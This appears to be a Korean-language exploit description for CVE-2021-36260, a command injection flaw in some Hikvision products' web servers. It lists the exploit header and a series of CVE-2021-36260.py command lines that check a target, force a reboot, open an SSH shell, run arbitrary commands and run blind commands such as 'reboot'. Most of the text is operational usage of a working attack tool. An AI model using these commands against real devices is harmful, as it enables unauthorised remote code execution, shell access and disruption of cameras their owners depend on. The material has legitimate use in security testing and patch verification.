
일부 Hikvision 제품의 웹 서버에서 명령 삽입 취약점이 발견되었습니다. 불충분한 입력 검증으로 인해 공격자는 악의적인 명령이 포함된 메시지를 전송하여 명령 삽입 공격을 수행할 수 있습니다.
CVE-2021-36260 POC, 일부 Hikvision 제품의 웹 서버에서 발생하는 명령 주입 취약점. 입력 검증이 충분하지 않아, 공격자는 악성 명령이 포함된 메시지를 전송하여 명령 주입 공격을 실행할 수 있습니다.
Exploit Title: Hikvision Web Server Build 210702 - Command Injection
Exploit Author: bashis
Vendor Homepage: https://www.hikvision.com/
Version: 1.0
CVE: CVE-2021-36260
Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
참고:
[예시] 안전한 취약점/확인 점검: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
안전한 확인과 안전하지 않은 확인 점검: ('안전한 확인'으로 확인되지 않은 경우에만 '안전하지 않은 확인' 사용) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
안전하지 않은 취약점/확인 점검: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
SSH 셸 실행 및 연결: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
명령 실행: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
블라인드 명령 실행: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"